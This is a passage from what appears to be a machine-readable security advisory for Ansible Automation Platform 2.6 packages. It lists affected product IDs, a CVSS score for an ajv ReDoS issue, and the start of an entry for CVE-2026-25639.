"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
